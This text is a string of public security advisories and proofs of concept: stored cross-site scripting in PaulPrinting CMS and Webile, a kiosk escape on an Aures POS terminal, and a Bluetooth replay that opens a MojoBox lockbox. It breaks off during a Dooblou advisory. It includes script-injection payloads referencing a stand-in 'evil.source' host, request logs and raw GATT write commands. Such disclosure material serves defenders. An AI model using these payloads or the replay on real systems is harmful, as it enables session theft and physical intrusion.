<pre><code>Document Title:<br />===============<br />PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2285<br /><br /><br />Release Date:<br />=============<br />2023-07-19<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2285<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.8<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.<br /><br />(Copy of the Homepage:https://codecanyon.net/user/codepaul )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application.<br /><br /><br />Affected Product(s):<br />====================<br />CodePaul<br />Product: PaulPrinting (2018) - CMS (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-08-25: Researcher Notification & Coordination (Security Researcher)<br />2022-08-26: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2023-07-19: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application.<br />The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser<br />to web-application requests from the application-side.<br /><br />The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code.<br />After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins<br />in the backend (listing).<br /><br />The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own<br />malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in<br />the backend (listing).<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to<br />malicious source and persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] /printing/register<br />[+] /account/delivery<br /><br />Vulnerable Input(s):<br />[+] First name<br />[+] Last name<br />[+] Address<br />[+] City<br />[+] State<br /><br />Vulnerable Parameter(s):<br />[+] firstname<br />[+] lastname<br />[+] address<br />[+] city<br />[+] state<br /><br />Affected Module(s):<br />[+] Frontend Settings (./printing/account/setting)<br />[+] Frontend Delivery Address (./printing/account/delivery)<br />[+] Backend User Preview Listing<br />[+] Backend Delivery Address Contact Review<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction.<br />For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.<br /><br /><br />Manual steps to reproduce the vulnerability ...<br />1. Open your browser and start a http session tamper<br />2. Register in the application by login click to register<br />3. Inject to the marked vulnerable input fields your test payload<br />4. Save the entry by submit via post method<br />5. Login to the account and preview the settings<br />Note: Administrators in the backend have the same wrong validated context that executes on preview of users<br />6. The script code executes on preview of the profile - settings<br />7. Successful reproduce of the first vulnerability!<br />8. Followup by opening the Delivery address module<br />9. Add a contact and add in the same vulnerable marked input fields your test payload<br />Note: T he script code executes on each review of the address in the backend or user frontend<br />10. Successful reproduce of the second vulnerability!<br /><br /><br />Exploitation: Payload<br />"<iframe src=evil.source onload(alert(document.cookie)><br />"<iframe src=evil.source onload(alert(document.domain)><br /><br /><br />--- PoC Session Logs (POST) ---<br />https://paulprinting.localhost:8000/printing/account/setting<br />Host: paulprinting.localhost:8000<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 357<br />Origin:https://paulprinting.localhost:8000<br />Connection: keep-alive<br />Referer:https://paulprinting.localhost:8000/printing/account/setting<br />Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;<br />POST:<br />title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>><br />&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>><br />&address=c"<iframe src=evil.source onload(alert(document.cookie)>><br />&city=d"<iframe src=evil.source onload(alert(document.cookie)>><br />&state=e"<iframe src=evil.source onload(alert(document.cookie)>><br />&zipcode=2342&country=BS&phone=23523515235235&save=Save<br />-<br />POST: HTTP/3.0 302 Found<br />content-type: text/html; charset=UTF-8<br />x-powered-by: PHP/7.1.33<br />location:https://paulprinting.localhost:8000/printing/account/setting?save=1<br />-<br />https://paulprinting.localhost:8000/printing/account/setting?save=1<br />Host: paulprinting.localhost:8000<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Referer:https://paulprinting.localhost:8000/printing/account/setting<br />Connection: keep-alive<br />Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;<br />-<br />POST: HTTP/3.0 200 OK<br />content-type: text/html; charset=UTF-8<br />x-powered-by: PHP/7.1.33<br /><br /><br />Vulnerable Source: Your Account - Settings<br /><div class="form-group row"><br /><label class="col-sm-4 col-form-label">First name</label><br /><div class="col-sm-8"><br /><input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>"><br /></div></div><br /><label class="col-sm-4 col-form-label">Last name</label><br /><div class="col-sm-8"><br /><input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>"><br /></div></div><br /><div class="form-group row"><br /><label class="col-sm-4 col-form-label">Address</label><br /><div class="col-sm-8"><br /><input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>"><br /></div></div><br /><div class="form-group row"><br /><label class="col-sm-4 col-form-label">City</label><br /><div class="col-sm-8"><br /><input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>"><br /></div></div><br /><div class="form-group row"><br /><label class="col-sm-4 col-form-label">State</label><br /><div class="col-sm-8"><br /><input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>"><br /></div></div><br /><br /><br />Vulnerable Source: Deliery Contact (Address)<br /><table class="table"><br /><thead><br /><tr><br /><th>Contact</th><br /><th>Address</th><br /><th>City</th><br /><th>State</th><br /><th>Country</th><br /><th></th><br /></tr><br /></thead><br /><tbody><tr><br /><td>a"<iframe src=evil.source onload(alert(document.cookie)></td><br /><td>b"<iframe src=evil.source onload(alert(document.cookie)></td><br /><td>c"<iframe src=evil.source onload(alert(document.cookie)></td><br /><td>d"<iframe src=evil.source onload(alert(document.cookie)></td><br /><td></td><br /><td class="text-right"><br /><a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|<br /><a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a><br /></td></tr></tbody><br /></table><br /><br /><br />Security Risk:<br />==============<br />The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code># Exploit Title: MojoBox v1.4 BLE replay attack<br /># Exploit Author: Matteo Mandolini<br /># Date : 15/03/2023<br /># Vendor Homepage: https://hello.showmojo.com/mojobox/<br /># Version: <1.4<br /># CVE: CVE-2023-34625<br /><br />BLE Replay attack <br /><br />ShowMojo MojoBox Digital Lockbox with firmware versione prior to 1.4 is vulnerable to authentication bypass. The implementation of the lock<br />opening mechanism via Bluetooth Low Energy (BLE) is vulnerable to replay attacks.<br /><br />PoC:<br />[MojoBox-023516]# gatt.select-attribute ff02<br />[MojoBox-023516:/service000c/char000f]# gatt.notify on<br />[CHG] Attribute /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000f Notifying: yes<br />Notify started<br />[MojoBox-023516:/service000c/char000d]# gatt.write "0x68 0x01 0x18 0x28 0xFC 0x08 0xE5 0xB9 0xDA 0xDB 0xCE 0x21 0x62 0x1B 0x2A 0xF9 0xBE 0xFB 0x1E 0xE9"<br />Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000d<br />[MojoBox-023516:/service000c/char000d]# gatt.write "0xA0 0x13 0xEE 0x11 0x94 0x31 0x7D 0xDB 0x16"<br />Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000d<br /></code></pre>
<pre><code>Document Title:<br />===============<br />Aures Booking & POS Terminal - Local Privilege Escalation<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2323<br /><br /><br />Release Date:<br />=============<br />2023-07-17<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2323<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />7.2<br /><br /><br />Vulnerability Class:<br />====================<br />Privilege Escalation<br /><br /><br />Current Estimated Price:<br />========================<br />3.000€ - 4.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or<br />freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk<br />features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner.<br />With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to<br />manage customer cards and promotions. Queue management can also be optimized.<br /><br />(Copy of the Homepage:https://aures.com/de/komet/ )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of<br />the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh.<br /><br /><br />Affected Product(s):<br />====================<br />Aures Technologies GmbH<br />Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2023-05-09: Researcher Notification & Coordination (Security Researcher)<br />2023-07-17: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Local<br /><br /><br />Severity Level:<br />===============<br />High<br /><br /><br />Authentication Type:<br />====================<br />Open Authentication (Anonymous Privileges)<br /><br /><br />User Interaction:<br />=================<br />No User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal<br />(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers<br />to bypass the kiosk mode to compromise the local file system and applications.<br /><br />It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are<br />able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security<br />vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local<br />privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate<br />local file-system information of the compromised windows based operating system.<br /><br />No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system<br />vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access.<br /><br />Vulnerable Operating System(s):<br />[+] Windows 10 (IoT Enterprise)<br /><br />Affected Component(s):<br />[+] Context Menu<br /><br />Affected Function(s):<br />[+] Web Search<br />[+] Share (Teilen)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The local vulnerability can be exploited by local attackers with physical device access without user interaction.<br />For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.<br /><br /><br />PoC: Sheet<br />Touch Display => Select Food Item => Highlight Text<br />=> Open Context Menu => Extend Context Menu => Web-Search<br />=> Browser => Local File System => Compromised!<br /><br /><br />Manual steps to reproduce the vulnerability ...<br />01. First touch the monitor display to move on from standby<br />02. Select an food item from the menu of immergrün (we recomment the cesar wraps)<br />03. Push the information button of the selected food item<br />04. Push twice via touch to mark the selected food item text<br />05. Press a third time after you have marked the context by holding it down on the touch display<br />06. Now the function context menu of the operating system for highlighted text appears<br />07. On the context menu appearing 3 dots to extend the visible function menu<br />08. Select the web-search or share function for the highlighted content in the context menu<br />09. The browser of the operating system opens on the main front screen<br />10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files)<br />10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)<br />10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information)<br />10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion)<br />10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.)<br />10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols<br />10.7 Attackers are able to perform man in the middle attacks from the local computer system<br />11.0 Successful reproduce of the security vulnerability!<br /><br /><br />Reference(s): Pictures<br />- 1.png (Terminal A)<br />- 2.png (Terminal B)<br />- 3.png (Escape)<br />- 4.png (Awareness)<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The security vulnerabilities can be patched by following steps:<br />1. Disable the content menu to extend<br />2. Disable the context menu<br />3. Disable web-search<br />4. Disable to mark text inputs & texts<br />5. Disallow to open not white listed websites<br />6. Disable to download files<br />7. Restrict the web-browser access<br />8. Disallow the file browser<br />9. Disable the browser debug modus<br />10. Reconfigure the local firewall to allow and disallow connections<br />11. Change the access permission to prevent exfiltration<br /><br /><br />Security Risk:<br />==============<br />The security risk of the vulnerability in the local booking and payment terminal system is considered high.<br />The issue can be easily exploited by local attackers with simple interaction via the touch display.<br />Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse<br />it for further simple or more complex attack scenarios.<br /><br /><br />Credits & Authors:<br />==================<br />Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.<br />Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Webile v1.0.1 - Multiple Cross Site Web Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2321<br /><br /><br />Release Date:<br />=============<br />2023-07-03<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2321<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.5<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in<br />the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,<br />statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other<br />functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,<br />Windows, Linux, iOS, Android and other multi-platform operating systems.<br /><br />(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.<br /><br />Affected Product(s):<br />====================<br />Product Owner: Webile<br />Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-10-11: Researcher Notification & Coordination (Security Researcher)<br />2022-10-12: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2023-07-03: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.<br />The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to<br />web-application requests from the application-side.<br /><br />The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious<br />script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious<br />source and persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Parameter(s):<br />[+] new_file_name<br />[+] i<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Vulnerable Source: Send<br />Send message to phone listing<br /><div class="layui-colla-item"><br /><div class="layui-card-header">Message</div><br /><div class="layui-colla-content" style="display:block;padding-left:16px;"><br /><div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;" <br />title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br><br /><span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div><br /></div></div></div><br />history logs messages<br /><table class="layui-table layui-form"><br /><thead><tr><br /><th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"><br /><input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th><br /><th style="border-right-width:1px;">Message</th><br /><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th><br /><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr><br /></thead><br /><tbody><tr><br /><td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"><br /><input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div><br /></td><br /><td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td><br /><td align="center">2022/07/17 20:10</td><br /><td class="td-manage" style="border-right-width:1px;text-align:center;"><br /><a title="Copy" onclick="copy(3)" href="javascript:;"><br /><i class="iconfont">&nbsp;&nbsp;</i><br /></a><br /><a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"><br /><i class="layui-icon">&nbsp;&nbsp;</i><br /></a></td></tr></tbody></table><br /><br /><br /><br />--- PoC Session Logs #1 (POST) --- (Add)<br />http://localhost:8080/file_action<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 210<br />Origin:http://localhost:8080<br />Connection: keep-alive<br />Referer:http://localhost:8080/webile_files<br />Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br />i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}<br />-<br />POST: HTTP/1.1 200 OK<br />Content-Type: application/json<br />Connection: keep-alive<br />Content-Encoding: gzip<br />Transfer-Encoding: chunked<br />-<br />http://localhost:8080/evil.source<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Referer:http://localhost:8080/webile_files<br />Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br />Upgrade-Insecure-Requests: 1<br />-<br />GET: HTTP/1.1 200 OK<br />Content-Type: application/octet-stream<br />Connection: keep-alive<br />Content-Length: 0<br />-<br />Cookie:<br />treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br /><br /><br /><br />--- PoC Session Logs #2 (POST) --- (Send)<br />http://localhost:8080/send<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 180<br />Origin:http://localhost:8080<br />Connection: keep-alive<br />Referer:http://localhost:8080/webile_send<br />Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br />i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}<br />-<br />POST: HTTP/1.1 200 OK<br />Content-Type: application/json<br />Connection: keep-alive<br />Content-Encoding: gzip<br />Transfer-Encoding: chunked<br />-<br />http://localhost:8080/evil.source<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Referer:http://localhost:8080/webile_send<br />Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6<br />Upgrade-Insecure-Requests: 1<br />-<br />GET: HTTP/1.1 200 OK<br />Content-Type: application/octet-stream<br />Date: Sun, 17 Jul 2022 18:08:33 GMT<br />Connection: keep-alive<br />Content-Length: 0<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2317<br /><br /><br />Release Date:<br />=============<br />2023-07-04<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2317<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.1<br /><br /><br />Vulnerability Class:<br />====================<br />Multiple<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.<br />No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.<br /><br />(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.<br /><br />Affected Product(s):<br />====================<br />Product Owner: dooblou<br />Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-19: Researcher Notification & Coordination (Security Researcher)<br />2022-01-20: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2023-07-04: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.<br />The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application<br />requests from the application-side.<br /><br />The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validated<br />and executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized to<br />perform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of the<br />front- & backend of the wifi explorer.<br /><br />Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, 